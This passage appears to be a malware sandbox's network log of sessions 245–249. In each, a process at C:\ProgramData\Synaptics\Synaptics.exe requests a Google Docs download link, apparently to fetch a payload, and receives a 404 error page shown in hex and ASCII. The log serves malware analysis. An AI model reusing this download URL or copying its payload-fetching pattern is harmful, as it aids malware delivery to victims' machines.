                                                                                                                                                                                        2022-05-17 11:32:02 UTC741INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 36 33 72 34 35 6a 74 4b 53 55 63 39 35 38 32 33 50 58 56 4d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Z63r45jtKSUc95823PXVMA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:02 UTC742INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:02 UTC742INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        245192.168.2.350025142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:01 UTC739OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:02 UTC742INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:02 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-K6/eijS74zlN/AoFOkuvTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:02 UTC744INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:02 UTC744INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 42 59 5a 67 64 4b 6f 4c 79 5a 4c 32 6a 2b 6e 33 42 56 30 71 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mBYZgdKoLyZL2j+n3BV0qQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:02 UTC745INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:02 UTC745INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        246192.168.2.350026142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:02 UTC742OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:02 UTC745INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:02 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Zzawp3vBzjAcEdUPcUp/Ew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:02 UTC747INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:02 UTC747INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 63 68 63 64 7a 6a 48 52 6c 65 57 6b 4a 38 31 38 4e 4c 6b 5a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BchcdzjHRleWkJ818NLkZg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:02 UTC748INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:02 UTC748INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        247192.168.2.350028142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:02 UTC745OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:02 UTC748INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:02 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-LVJ98ojbNQ28cpc1kIMizQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:02 UTC750INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 59 4c 6e 31 58 69 4b 55 32 6c 67 66 43 6e 64 75 37 77 6c 32 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JYLn1XiKU2lgfCndu7wl2A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:02 UTC751INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:02 UTC751INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        248192.168.2.350030142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:02 UTC748OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:02 UTC752INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:02 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ca5TO9TmeDWbycrhvgYM1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:02 UTC753INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:02 UTC753INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 68 56 62 4a 6e 2f 78 6e 62 79 77 38 31 49 7a 49 44 39 57 70 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZhVbJn/xnbyw81IzID9WpA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:02 UTC754INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:02 UTC754INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        249192.168.2.350031142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:02 UTC751OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:02 UTC755INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:02 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-GV/7aGXJN6vSig+/Q0SbdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
